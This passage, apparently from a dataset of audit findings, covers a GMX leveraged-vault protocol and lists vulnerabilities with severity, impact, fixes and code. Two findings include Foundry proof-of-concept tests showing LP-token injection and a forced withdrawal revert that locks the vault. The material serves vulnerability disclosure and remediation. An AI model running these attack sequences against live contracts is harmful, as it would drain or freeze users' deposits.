The longer the period since the last `mintFee` was called the more excess tokens the user receives.\\nThe protocol mints vault token shares as management fees to protocol treasury with the `mintFee` function. This increases the `totalSupply` of the shares. The amount of minted fees depends on the time since the last `mintFee` call.\\n```\\n function mintFee() public {\\n _mint(_store.treasury, GMXReader.pendingFee(_store));\\n _store.lastFeeCollected = block.timestamp;\\n }\\n```\\n\\nWhile withdrawal amount of LP-token can be calculated with outdated totalSupply:\\n```\\n67 _wc.shareRatio = wp.shareAmt\\n68 * SAFE_MULTIPLIER\\n69 / IERC20(address(self.vault)).totalSupply();\\n70 _wc.lpAmt = _wc.shareRatio\\n71 * GMXReader.lpAmt(self)\\n72 / SAFE_MULTIPLIER;\\n\\n101 self.vault.mintFee();\\n```\\n\\nThe `mintFee` is called only after this calculation.чUsers withdraw more assets than should when `mintFee` was called long ago\\nConsider calling the `mintFee` before the `_wc.shareRatio` calculation.чUsers can receive excess amounts of tokens during withdrawal. Other users and the protocol management lose value of their shares.\\nTools used\\nManual Reviewч```\\n function mintFee() public {\\n _mint(_store.treasury, GMXReader.pendingFee(_store));\\n _store.lastFeeCollected = block.timestamp;\\n }\\n```\\n -Inaccurate Fee Due to missing lastFeeCollected Update Before feePerSecond ModificationчmediumчThe protocol charges a management fee based on the `feePerSecond` variable, which dictates the rate at which new vault tokens are minted as fees via the `mintFee` function. An administrative function `updateFeePerSecond` allows the owner to alter this fee rate. However, the current implementation does not account for accrued fees before the update, potentially leading to incorrect fee calculation.\\nThe contract's logic fails to account for outstanding fees at the old rate prior to updating the `feePerSecond`. 
As it stands, the `updateFeePerSecond` function changes the fee rate without triggering a `mintFee`, which would update the `lastFeeCollected` timestamp and mint the correct amount of fees owed up until that point.\\n```\\nfunction updateFeePerSecond(uint256 feePerSecond) external onlyOwner {\\n _store.feePerSecond = feePerSecond;\\n emit FeePerSecondUpdated(feePerSecond);\\n }\\n```\\n\\nScenario Illustration:\\nUser A deposits, triggering `mintFee` and setting `lastFeeCollected` to the current `block.timestamp`.\\nAfter two hours without transactions, no additional `mintFee` calls occur.\\nThe owner invokes `updateFeePerSecond` to increase the fee by 10%.\\nUser B deposits, and `mintFee` now calculates fees since `lastFeeCollected` using the new, higher rate, incorrectly applying it to the period before the rate change.чInaccurate Fee Due to missing lastFeeCollected Update Before feePerSecond Modification\\nEnsure the fees are accurately accounted for at their respective rates by updating `lastFeeCollected` to the current timestamp prior to altering the `feePerSecond`. This can be achieved by invoking `mintFee` within the `updateFeePerSecond` function to settle all pending fees first:\\n```\\nfunction updateFeePerSecond(uint256 feePerSecond) external onlyOwner {\\n self.vault.mintFee();\\n _store.feePerSecond = feePerSecond;\\n emit FeePerSecondUpdated(feePerSecond);\\n }\\n```\\nчThe impact is twofold:\\nAn increased `feePerSecond` results in excessively high fees charged for the period before the update.\\nA decreased `feePerSecond` leads to lower-than-expected fees for the same duration.ч```\\nfunction updateFeePerSecond(uint256 feePerSecond) external onlyOwner {\\n _store.feePerSecond = feePerSecond;\\n emit FeePerSecondUpdated(feePerSecond);\\n }\\n```\\n -Token injection leads to unintended behavior of vaultчmediumчWhen a token is deposited/withdrawn in a vault, it happens in two steps. 
In the first step, some states of the vault are saved, which are partially important for the second step, and a request to deposit/withdraw is made to GMX. In the second step, GMX calls the callback function, and the vault completes the deposit/withdrawal. The problem is that one can send LP tokens to the contract between these two steps, causing the vault to behave unintentionally.\\nDeposit\\nHere is a PoC for the effects when sending lpTokens between the two steps during deposit:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.21;\\nimport { console, console2 } from \"forge-std/Test.sol\";\\nimport { TestUtils } from \"../../helpers/TestUtils.sol\";\\nimport { IERC20 } from \"@openzeppelin/contracts/token/ERC20/IERC20.sol\";\\nimport { GMXMockVaultSetup } from \"./GMXMockVaultSetup.t.sol\";\\nimport { GMXTypes } from \"../../../contracts/strategy/gmx/GMXTypes.sol\";\\nimport { GMXTestHelper } from \"./GMXTestHelper.sol\";\\n\\nimport { IDeposit } from \"../../../contracts/interfaces/protocols/gmx/IDeposit.sol\";\\nimport { IEvent } from \"../../../contracts/interfaces/protocols/gmx/IEvent.sol\";\\n\\ncontract GMXDepositTest is GMXMockVaultSetup, GMXTestHelper, TestUtils {\\n function test_POC2() public {\\n uint256 lpAmtUser1 = 0.000005e18; //~400$ (because price of lpToken = 79990000$)\\n\\n //In the setup, the owner receives a few lpTokens, which are now sent to user1 for testing the token injection\\n vm.startPrank(owner);\\n IERC20(address(WETHUSDCpair)).transfer(address(user1), lpAmtUser1);\\n vm.stopPrank();\\n \\n //Owner deposits in Vault\\n vm.startPrank(owner);\\n _createDeposit(address(WETH), 10 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n\\n //Variable for Assertion\\n (,uint256 debtAmtTokenBBefore) = vault.debtAmt();\\n\\n vm.startPrank(user1);\\n _createDeposit(address(WETH), 0.1 ether, 0, SLIPPAGE, EXECUTION_FEE); 
//User1 creates deposit. The 0.1 ether is being leveraged\\n IERC20(address(WETHUSDCpair)).transfer(address(vault), lpAmtUser1); //User1 injects lp-tokens between createDeposit and processDeposit. They are not leveraged\\n vm.stopPrank();\\n //In step one, the equity was saved before the deposit. The equity depends on the LP amount and the debts to the lending Vaults. In step two, \\n //the saved equity is used alongside the current equity to calculate how many Vault shares a user receives. This way, user1 receives shares \\n //for their injected tokens that do not have any leverage.(so no borrowing from the lending vaults was done for these tokens)\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n \\n //User1 withdraws all his tokens.\\n uint256 vaultSharesAmount = IERC20(address(vault)).balanceOf(user1);\\n vm.startPrank(user1);\\n //In the case of a withdrawal, the debts to the LendingVaults are also repaid. Since it is assumed that all tokens have been leveraged, there \\n //is a mistaken repayment to the lending vaults for the injected tokens as well.\\n _createAndExecuteWithdrawal(address(WETH), address(USDC), address(USDC), vaultSharesAmount, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n\\n //Variable for Assertion\\n (,uint256 debtAmtTokenBAfter) = vault.debtAmt();\\n \\n //After User1 withdrew their LP tokens, the debt amount for TokenB would normally be approximately the same as it was before User1 deposited. \\n //However, due to the unleveraged tokens, more debt was repaid, resulting in a lower debt and, consequently, lower leverage than before.\\n assert(debtAmtTokenBBefore - 750e6 > debtAmtTokenBAfter); //750e6 == $750. 
This is to show that the debt is significantly less than before\\n\\n console.log(\"debtAmtTokenBBefore: %s\", debtAmtTokenBBefore);\\n console.log(\"debtAmtTokenBAfter: %s\", debtAmtTokenBAfter);\\n }\\n}\\n```\\n\\nSince the user can withdraw their injected tokens, which they received VaultShares for, they could execute this action multiple times to further worsen the tokenB debt amount and, consequently, the leverage.\\nThe POC can be started with this command: `forge test --match-test test_POC2 -vv`\\nWithdraw\\nWhen withdrawing, LP tokens can also be injected between the two steps. This can be exploited by an attacker because he can fail the afterWithdrawChecks if he sends the same amount of lp tokens that a user wants to withdraw.\\nHere is the check that the attacker could exploit by sending enough tokens to make the lpAmt as large as it was before the withdrawal:\\n```\\nFile: GMXChecks.sol#afterWithdrawChecks\\nif (GMXReader.lpAmt(self) >= self.withdrawCache.healthParams.lpAmtBefore)\\n revert Errors.InsufficientLPTokensBurned();\\n```\\nчIn the deposit function, the depositValue should be used to determine approximately how many lpTokens GMX will be transferred to the vault. 
This number should then be compared to the actual received amount in processDeposit.\\nIn the case of withdrawal, after calling removeLiquidity, the lpAmt should be stored, and this should be compared to the lpAmt in the processWithdraw function to determine whether tokens were injected.чSince, if this bug is exploited during deposit, an attacker can decrease the leverage, it results in users of the vault having less leverage and lower yield.\\nWhen withdrawing, the attacker can potentially cause the withdrawal to fail, but the user doesn't lose anything and can try again.ч```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.21;\\nimport { console, console2 } from \"forge-std/Test.sol\";\\nimport { TestUtils } from \"../../helpers/TestUtils.sol\";\\nimport { IERC20 } from \"@openzeppelin/contracts/token/ERC20/IERC20.sol\";\\nimport { GMXMockVaultSetup } from \"./GMXMockVaultSetup.t.sol\";\\nimport { GMXTypes } from \"../../../contracts/strategy/gmx/GMXTypes.sol\";\\nimport { GMXTestHelper } from \"./GMXTestHelper.sol\";\\n\\nimport { IDeposit } from \"../../../contracts/interfaces/protocols/gmx/IDeposit.sol\";\\nimport { IEvent } from \"../../../contracts/interfaces/protocols/gmx/IEvent.sol\";\\n\\ncontract GMXDepositTest is GMXMockVaultSetup, GMXTestHelper, TestUtils {\\n function test_POC2() public {\\n uint256 lpAmtUser1 = 0.000005e18; //~400$ (because price of lpToken = 79990000$)\\n\\n //In the setup, the owner receives a few lpTokens, which are now sent to user1 for testing the token injection\\n vm.startPrank(owner);\\n IERC20(address(WETHUSDCpair)).transfer(address(user1), lpAmtUser1);\\n vm.stopPrank();\\n \\n //Owner deposits in Vault\\n vm.startPrank(owner);\\n _createDeposit(address(WETH), 10 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n\\n //Variable for Assertion\\n (,uint256 debtAmtTokenBBefore) = vault.debtAmt();\\n\\n 
vm.startPrank(user1);\\n _createDeposit(address(WETH), 0.1 ether, 0, SLIPPAGE, EXECUTION_FEE); //User1 creates deposit. The 0.1 ether is being leveraged\\n IERC20(address(WETHUSDCpair)).transfer(address(vault), lpAmtUser1); //User1 injects lp-tokens between createDeposit and processDeposit. They are not leveraged\\n vm.stopPrank();\\n //In step one, the equity was saved before the deposit. The equity depends on the LP amount and the debts to the lending Vaults. In step two, \\n //the saved equity is used alongside the current equity to calculate how many Vault shares a user receives. This way, user1 receives shares \\n //for their injected tokens that do not have any leverage.(so no borrowing from the lending vaults was done for these tokens)\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n \\n //User1 withdraws all his tokens.\\n uint256 vaultSharesAmount = IERC20(address(vault)).balanceOf(user1);\\n vm.startPrank(user1);\\n //In the case of a withdrawal, the debts to the LendingVaults are also repaid. Since it is assumed that all tokens have been leveraged, there \\n //is a mistaken repayment to the lending vaults for the injected tokens as well.\\n _createAndExecuteWithdrawal(address(WETH), address(USDC), address(USDC), vaultSharesAmount, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n\\n //Variable for Assertion\\n (,uint256 debtAmtTokenBAfter) = vault.debtAmt();\\n \\n //After User1 withdrew their LP tokens, the debt amount for TokenB would normally be approximately the same as it was before User1 deposited. \\n //However, due to the unleveraged tokens, more debt was repaid, resulting in a lower debt and, consequently, lower leverage than before.\\n assert(debtAmtTokenBBefore - 750e6 > debtAmtTokenBAfter); //750e6 == $750. 
This is to show that the debt is significantly less than before\\n\\n console.log(\"debtAmtTokenBBefore: %s\", debtAmtTokenBBefore);\\n console.log(\"debtAmtTokenBAfter: %s\", debtAmtTokenBAfter);\\n }\\n}\\n```\\n -User can revert processWithdrawчhighчWhen a user wants to withdraw his tokens after depositing, the LP tokens are first sent to GMX. GMX then sends back the deposited tokens. Before the user receives them, their Vault Shares are burned in processWithdraw:\\n```\\nFile: GMXWithdraw.sol#processWithdraw\\nself.vault.burn(self.withdrawCache.user, self.withdrawCache.withdrawParams.shareAmt);\\n```\\n\\nA user could, after the LP tokens have been transferred to GMX and the Vault is waiting for the callback, transfer his Vault Shares away from his address. This would result in not having enough tokens left during the burn, causing a revert. Afterward, the Vault would be stuck in the 'Withdraw' state because, although the keeper could call the function again, it would result in revert again.\\nHere is a POC that demonstrates how a user can cause the processWithdraw to revert:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.21;\\nimport { console, console2 } from \"forge-std/Test.sol\";\\nimport { TestUtils } from \"../../helpers/TestUtils.sol\";\\nimport { IERC20 } from \"@openzeppelin/contracts/token/ERC20/IERC20.sol\";\\nimport { IERC20Errors } from \"@openzeppelin/contracts/interfaces/draft-IERC6093.sol\";\\nimport { GMXMockVaultSetup } from \"./GMXMockVaultSetup.t.sol\";\\nimport { GMXTypes } from \"../../../contracts/strategy/gmx/GMXTypes.sol\";\\nimport { GMXTestHelper } from \"./GMXTestHelper.sol\";\\n\\nimport { IDeposit } from \"../../../contracts/interfaces/protocols/gmx/IDeposit.sol\";\\nimport { IEvent } from \"../../../contracts/interfaces/protocols/gmx/IEvent.sol\";\\nimport { Attacker } from \"./Attacker.sol\";\\n\\ncontract GMXDepositTest is GMXMockVaultSetup, GMXTestHelper, TestUtils {\\n function test_POC4() public {\\n //owner 
deposits\\n vm.startPrank(address(owner));\\n _createAndExecuteDeposit(address(WETH), address(USDC), address(WETH), 10 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n\\n //user1 deposits\\n vm.startPrank(address(user1));\\n _createAndExecuteDeposit(address(WETH), address(USDC), address(WETH), 10 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n \\n uint256 vaultSharesAmt = IERC20(address(vault)).balanceOf(address(user1)); //Vault Shares from user1 to withdraw\\n vm.startPrank(address(user1));\\n _createWithdrawal(address(USDC), vaultSharesAmt, 0, SLIPPAGE, EXECUTION_FEE); //User 1 creates a withdrawal\\n IERC20(address(vault)).transfer(address(user2), vaultSharesAmt); //Before processWithdraw is executed and the user's Vault Shares are burned, he sends them away\\n\\n vm.expectRevert(\\n abi.encodeWithSelector(IERC20Errors.ERC20InsufficientBalance.selector, address(user1), 0, vaultSharesAmt)\\n );\\n mockExchangeRouter.executeWithdrawal(address(WETH), address(USDC), address(vault), address(callback)); //executeWithdraw reverted as there are no tokens to burn\\n vm.stopPrank();\\n\\n GMXTypes.Store memory _store = vault.store();\\n assert(uint256(_store.status) == uint256(GMXTypes.Status.Withdraw)); //shows that the vault is still in the Withdraw status\\n }\\n}\\n```\\n\\nThe POC can be started with this command: `forge test --match-test test_POC4 -vv`чTokens should be burned immediately after remove liquidity is called in GMXWithdraw.sol:\\n```\\n// Add the line below\\n 154: self.vault.burn(self.withdrawCache.user, self.withdrawCache.withdrawParams.shareAmt);\\n// Remove the line below\\n 197: self.vault.burn(self.withdrawCache.user, self.withdrawCache.withdrawParams.shareAmt);\\n```\\nчA user could put the Vault into a 'Stuck' state that can only be exited through 'emergencyPause' and 'emergencyResume.' This would take some time as 'emergencyResume' can only be called by the owner, who is a Multisig with a Timelock. 
(A keeper could also call 'processWithdrawCancellation,' but in this case, the debt to the lending vault would not be repaid. The tokens withdrawn by GMX would simply remain in the vault, and the user's Vault Shares would not be burned.)ч```\\nFile: GMXWithdraw.sol#processWithdraw\\nself.vault.burn(self.withdrawCache.user, self.withdrawCache.withdrawParams.shareAmt);\\n```\\n -Incorrect slippage protection on depositsчhighчThe slippage on deposits is enforced by the `minMarketTokenAmt` parameter. But in the calculation of `minMarketTokenAmt`, the slippage is factored on the user's deposit value and not the leveraged amount which is actually being deposited to GMX.\\n```\\n function deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n ) external {\\n \\n // rest of code// rest of code. more code \\n\\n if (dp.token == address(self.lpToken)) {\\n // If LP token deposited\\n _dc.depositValue = self.gmxOracle.getLpTokenValue(\\n address(self.lpToken),\\n address(self.tokenA),\\n address(self.tokenA),\\n address(self.tokenB),\\n false,\\n false\\n )\\n * dp.amt\\n / SAFE_MULTIPLIER;\\n } else {\\n // If tokenA or tokenB deposited\\n _dc.depositValue = GMXReader.convertToUsdValue(\\n self,\\n address(dp.token),\\n dp.amt\\n );\\n }\\n \\n // rest of code// rest of code. 
more code\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n _alp.minMarketTokenAmt = GMXManager.calcMinMarketSlippageAmt(\\n self,\\n _dc.depositValue,\\n dp.slippage\\n );\\n _alp.executionFee = dp.executionFee;\\n\\n\\n _dc.depositKey = GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n```\\n\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/0f909e2f0917cb9ad02986f631d622376510abec/contracts/strategy/gmx/GMXDeposit.sol#L54-L146\\nBut vaults with leverage greater than 1 will be adding more than `_dc.depositValue` worth of liquidity in which case the calculated `minMarketTokenAmt` will result in a much higher slippage.\\nExample Scenario\\nThe vault is a 3x leveraged vault\\nUser deposits 1 usd worth tokenA and sets slippage to 1%.\\nThe `minMarketTokenAmt` calculated is worth 0.99 usd\\nThe actual deposit added is worth 3 usd due to leverage\\nThe deposit receives 2.90 worth of LP token which is more than 1% slippageчUse the actual deposit value instead of the user's initial deposit value when calculating the `minMarketTokenAmt`\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/contracts/strategy/gmx/GMXDeposit.sol b/contracts/strategy/gmx/GMXDeposit.sol\\nindex 1b28c3b..aeba68b 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/contracts/strategy/gmx/GMXDeposit.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/contracts/strategy/gmx/GMXDeposit.sol\\n@@ // Remove the line below\\n135,7 // Add the line below\\n135,15 @@ library GMXDeposit {\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n _alp.minMarketTokenAmt = GMXManager.calcMinMarketSlippageAmt(\\n self,\\n// Remove the line below\\n _dc.depositValue,\\n// Add the line below\\n GMXReader.convertToUsdValue(\\n// Add the line below\\n self,\\n// Add the line below\\n address(self.tokenA),\\n// Add the line below\\n _alp.tokenAAmt\\n// 
Add the line below\n ) // Add the line below\n GMXReader.convertToUsdValue(\n// Add the line below\n self,\n// Add the line below\n address(self.tokenB),\n// Add the line below\n _alp.tokenBAmt\n// Add the line below\n ),\n dp.slippage\n );\n _alp.executionFee = dp.executionFee;\n```\nчDepositors can lose valueч```\n function deposit(\n GMXTypes.Store storage self,\n GMXTypes.DepositParams memory dp,\n bool isNative\n ) external {\n \n // rest of code// rest of code. more code \n\n if (dp.token == address(self.lpToken)) {\n // If LP token deposited\n _dc.depositValue = self.gmxOracle.getLpTokenValue(\n address(self.lpToken),\n address(self.tokenA),\n address(self.tokenA),\n address(self.tokenB),\n false,\n false\n )\n * dp.amt\n / SAFE_MULTIPLIER;\n } else {\n // If tokenA or tokenB deposited\n _dc.depositValue = GMXReader.convertToUsdValue(\n self,\n address(dp.token),\n dp.amt\n );\n }\n \n // rest of code// rest of code. more code\n\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\n _alp.minMarketTokenAmt = GMXManager.calcMinMarketSlippageAmt(\n self,\n _dc.depositValue,\n dp.slippage\n );\n _alp.executionFee = dp.executionFee;\n\n\n _dc.depositKey = GMXManager.addLiquidity(\n self,\n _alp\n );\n```\n -incorrect handling for deposit failure leads to stuck at `deposit_failed` status.чmediumчWhen a deposit fails, the contract can become stuck in a `deposit_failed` status due to improper handling of debt repayment by swapping through the `swapTokensForExactTokens()` function, which leads to gas losses for keeper attempting to handle that and puts user deposits at risk.\nIn case of a user making a deposit to the `strategy`, it will create a deposit in `GMX`. 
After a successful deposit, `GMX` will call the callback function `afterDepositExecution`, and the callback function will call `processDeposit`.\\nIf the `processDeposit()` fails in the `try` call for any reason, the function will `catch` that and set the status to `deposit_failed`. An event will be emitted so the keeper can handle it.\\n```\\n function processDeposit(GMXTypes.Store storage self) external {\\n // some code ..\\n try GMXProcessDeposit.processDeposit(self) {\\n // ..more code\\n } catch (bytes memory reason) {\\n self.status = GMXTypes.Status.Deposit_Failed;\\n\\n emit DepositFailed(reason);\\n }\\n }\\n```\\n\\nThe keeper calls the function processDepositFailure(). This function initiates a `requestWithdraw` to `GMX` to remove the liquidity added by the user deposit (+ the borrowed amount).\\nAfter executing the `removeLiquidity`, the callback function `afterWithdrawalExecution` is triggered. and since the status is `deposit_failed`, it invokes the function `processDepositFailureLiquidityWithdrawal`.\\nIn `processDepositFailureLiquidityWithdrawal`, it first checks if a swap is necessary. If required, it swaps tokens to repay the debt.\\n```\\n (bool _swapNeeded, address _tokenFrom, address _tokenTo, uint256 _tokenToAmt) =\\n GMXManager.calcSwapForRepay(self, _rp);\\n\\n if (_swapNeeded) {\\n\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = _tokenFrom;\\n _sp.tokenOut = _tokenTo;\\n _sp.amountIn = IERC20(_tokenFrom).balanceOf(address(this));\\n _sp.amountOut = _tokenToAmt;\\n _sp.slippage = self.minSlippage;\\n _sp.deadline = block.timestamp;\\n GMXManager.swapTokensForExactTokens(self, _sp);\\n }\\n```\\n\\nThe problem arises if the swap revert if the `tokenIn` balance is insufficient to cover the `_amountOut` of `_tokenOut`, leading to a failed swap since the swap function is `swapTokensForExactTokens`. 
Consequently, the status remains `deposit_failed` and the callback reverts.\nNote: The swap can fail for various reasons.\nIn this scenario, the keeper can only invoke the `processDepositFailure()` function again. During the second call, it directly triggers `processDepositFailureLiquidityWithdrawal` since the `lp` tokens for the failed deposit have already been withdrawn.\n```\n function processDepositFailure(GMXTypes.Store storage self, uint256 slippage, uint256 executionFee) external {\n GMXChecks.beforeProcessAfterDepositFailureChecks(self);\n\n GMXTypes.RemoveLiquidityParams memory _rlp;\n\n // If current gmx LP amount is somehow less or equal to amount before, we do not remove any liquidity\n if (GMXReader.lpAmt(self) <= self.depositCache.healthParams.lpAmtBefore) {\n processDepositFailureLiquidityWithdrawal(self);\n //// rest of code more code\n }}\n```\n\nThe swap will always revert because the contract's balance of `tokenIn` will never be sufficient to cover the `_amountOut` of `_tokenOut`. Consequently, the status remains stuck at `deposit_failed`.чUtilize `swapExactTokensForTokens` and swap the remaining tokens from `tokenIn` — after subtracting the debt that needs to be repaid in this token — for `tokenOut`.\nImplement safeguards to calculate the appropriate amount for swapping, avoiding potential reverting transactions. 
Here's an example of how to calculate the swap amount:\\n` if (rp.repayTokenAAmt > self.tokenA.balanceOf(address(this))) {\\n // If more tokenA is needed for repayment\\n if(rp.repayTokenBAmt < self.tokenB.balanceOf(address(this))){\\n _tokenToAmt = self.tokenB.balanceOf(address(this)) - rp.repayTokenBAmt;\\n _tokenFrom = address(self.tokenB);\\n _tokenTo = address(self.tokenA);\\n }\\n }`чThe strategy remains stuck at the `deposit_failed` status, halting any further interactions with the protocol.\\nKeepers lose gas for each call to `processDepositFailure()`.\\nUsers may lose their deposits.ч```\\n function processDeposit(GMXTypes.Store storage self) external {\\n // some code ..\\n try GMXProcessDeposit.processDeposit(self) {\\n // ..more code\\n } catch (bytes memory reason) {\\n self.status = GMXTypes.Status.Deposit_Failed;\\n\\n emit DepositFailed(reason);\\n }\\n }\\n```\\n -Missing fees allow cheap griefing attacks that lead to DoSчmediumчThe protocol has chosen a design pattern which does not allow two users at the same time to interact with the system as every time a user deposits or withdraws funds a 2-step process begins which interacts with GMX and only after this process is closed, another user is allowed to start a new process. This design pattern can be abused as griefing attack by front running all user calls with a small deposit, or withdraw call, to DoS the user's call. 
As the protocol is deployed on L2 blockchains with low transaction fees and does not take fees on depositing or withdrawing funds, this DoS griefing attack is cheap and can be scaled to a point where nobody is able to interact with the system.\nThe design pattern of the system which leads to this possibility is the status variable.\nThe flow for such a griefing attack would look like the following:\nThe system's status is Open\nUser wants to deposit or withdraw and creates a transaction to do so\nAttacker front runs the call of the user and deposits or withdraws a small amount of funds (System's status changes to Deposit or Withdraw)\nUser's call gets reverted as the check if the system's status is Open reverts\nDeposit function calls beforeDepositChecks and updates the status to Deposit:\n```\nfunction deposit(\n GMXTypes.Store storage self,\n GMXTypes.DepositParams memory dp,\n bool isNative\n) external {\n // rest of code\n GMXChecks.beforeDepositChecks(self, _dc.depositValue);\n\n self.status = GMXTypes.Status.Deposit;\n // rest of code\n}\n```\n\nThe beforeDepositChecks function reverts if the current status is not Open:\n```\nfunction beforeDepositChecks(\n GMXTypes.Store storage self,\n uint256 depositValue\n) external view {\n if (self.status != GMXTypes.Status.Open)\n revert Errors.NotAllowedInCurrentVaultStatus();\n // rest of code\n}\n```\n\nThe same pattern is implemented in the withdraw flow.чImplement fees, for depositing and withdrawing, to increase the costs of such a griefing attack, or rethink the status architecture.чDoS of the whole system for all depositors.ч```\nfunction deposit(\n GMXTypes.Store storage self,\n GMXTypes.DepositParams memory dp,\n bool isNative\n) external {\n // rest of code\n GMXChecks.beforeDepositChecks(self, _dc.depositValue);\n\n self.status = GMXTypes.Status.Deposit;\n // rest of code\n}\n```\n -Yield in trove is lost when closing a strategy vaultчhighчThe funds in the trove 
contract are not claimed during the emergency close flow and can not be claimed in a normal way during this situation, because of a status change. Therefore, all the acquired yield will be lost.\\nWhen users deposit, or withdraw tokens, all acquired yield from GMX is sent to the trove contract:\\n```\\nfunction deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n) external {\\n // Sweep any tokenA/B in vault to the temporary trove for future compouding and to prevent\\n // it from being considered as part of depositor's assets\\n if (self.tokenA.balanceOf(address(this)) > 0) {\\n self.tokenA.safeTransfer(self.trove, self.tokenA.balanceOf(address(this)));\\n }\\n if (self.tokenB.balanceOf(address(this)) > 0) {\\n self.tokenB.safeTransfer(self.trove, self.tokenB.balanceOf(address(this)));\\n }\\n // rest of code\\n}\\n```\\n\\n```\\nfunction withdraw(\\n GMXTypes.Store storage self,\\n GMXTypes.WithdrawParams memory wp\\n) external {\\n // Sweep any tokenA/B in vault to the temporary trove for future compouding and to prevent\\n // it from being considered as part of withdrawers assets\\n if (self.tokenA.balanceOf(address(this)) > 0) {\\n self.tokenA.safeTransfer(self.trove, self.tokenA.balanceOf(address(this)));\\n }\\n if (self.tokenB.balanceOf(address(this)) > 0) {\\n self.tokenB.safeTransfer(self.trove, self.tokenB.balanceOf(address(this)));\\n }\\n // rest of code\\n}\\n```\\n\\nThe only way in the system to claim these yield is the compound function, which calls the beforeCompoundChecks function:\\n```\\nfunction compound(\\n GMXTypes.Store storage self,\\n GMXTypes.CompoundParams memory cp\\n) external {\\n // Transfer any tokenA/B from trove to vault\\n if (self.tokenA.balanceOf(address(self.trove)) > 0) {\\n self.tokenA.safeTransferFrom(\\n address(self.trove),\\n address(this),\\n self.tokenA.balanceOf(address(self.trove))\\n );\\n }\\n if (self.tokenB.balanceOf(address(self.trove)) > 0) {\\n 
self.tokenB.safeTransferFrom(\\n address(self.trove),\\n address(this),\\n self.tokenB.balanceOf(address(self.trove))\\n );\\n }\\n // rest of code\\n GMXChecks.beforeCompoundChecks(self);\\n // rest of code\\n}\\n```\\n\\nThis function reverts if the current status of the system is not Open or Compound_Failed:\\n```\\nfunction beforeCompoundChecks(\\n GMXTypes.Store storage self\\n) external view {\\n if (\\n self.status != GMXTypes.Status.Open &&\\n self.status != GMXTypes.Status.Compound_Failed\\n ) revert Errors.NotAllowedInCurrentVaultStatus();\\n // rest of code\\n}\\n```\\n\\nAs the emergency close flow updates this status to Paused and later to Closed, calling compound will revert:\\n```\\nfunction emergencyPause(\\n GMXTypes.Store storage self\\n) external {\\n self.refundee = payable(msg.sender);\\n\\n GMXTypes.RemoveLiquidityParams memory _rlp;\\n\\n // Remove all of the vault's LP tokens\\n _rlp.lpAmt = self.lpToken.balanceOf(address(this));\\n _rlp.executionFee = msg.value;\\n\\n GMXManager.removeLiquidity(\\n self,\\n _rlp\\n );\\n\\n self.status = GMXTypes.Status.Paused;\\n\\n emit EmergencyPause();\\n}\\n```\\n\\n```\\nfunction emergencyClose(\\n GMXTypes.Store storage self,\\n uint256 deadline\\n) external {\\n GMXChecks.beforeEmergencyCloseChecks(self);\\n\\n // Repay all borrowed assets; 1e18 == 100% shareRatio to repay\\n GMXTypes.RepayParams memory _rp;\\n (\\n _rp.repayTokenAAmt,\\n _rp.repayTokenBAmt\\n ) = GMXManager.calcRepay(self, 1e18);\\n\\n (\\n bool _swapNeeded,\\n address _tokenFrom,\\n address _tokenTo,\\n uint256 _tokenToAmt\\n ) = GMXManager.calcSwapForRepay(self, _rp);\\n\\n if (_swapNeeded) {\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = _tokenFrom;\\n _sp.tokenOut = _tokenTo;\\n _sp.amountIn = IERC20(_tokenFrom).balanceOf(address(this));\\n _sp.amountOut = _tokenToAmt;\\n _sp.slippage = self.minSlippage;\\n _sp.deadline = deadline;\\n\\n GMXManager.swapTokensForExactTokens(self, _sp);\\n }\\n\\n GMXManager.repay(\\n 
self,\\n _rp.repayTokenAAmt,\\n _rp.repayTokenBAmt\\n );\\n\\n self.status = GMXTypes.Status.Closed;\\n\\n emit EmergencyClose(\\n _rp.repayTokenAAmt,\\n _rp.repayTokenBAmt\\n );\\n}\\n```\\n\\nAnd as we can see during these process the funds inside the trove contract are never claimed and as the strategy vault is the only address that can claim the funds of the trove, all funds are gone.\\n```\\ncontract GMXTrove {\\n\\n /* ==================== STATE VARIABLES ==================== */\\n\\n // Address of the vault this trove handler is for\\n IGMXVault public vault;\\n\\n /* ====================== CONSTRUCTOR ====================== */\\n\\n /**\\n * @notice Initialize trove contract with associated vault address\\n * @param _vault Address of vault\\n */\\n constructor (address _vault) {\\n vault = IGMXVault(_vault);\\n\\n GMXTypes.Store memory _store = vault.store();\\n\\n // Set token approvals for this trove's vault contract\\n _store.tokenA.approve(address(vault), type(uint256).max);\\n _store.tokenB.approve(address(vault), type(uint256).max);\\n }\\n}\\n```\\nчTransfer the funds inside the trove into the vault during the emergency close process.чIf a strategy vault is closed, all funds in the trove are lost.ч```\\nfunction deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n) external {\\n // Sweep any tokenA/B in vault to the temporary trove for future compouding and to prevent\\n // it from being 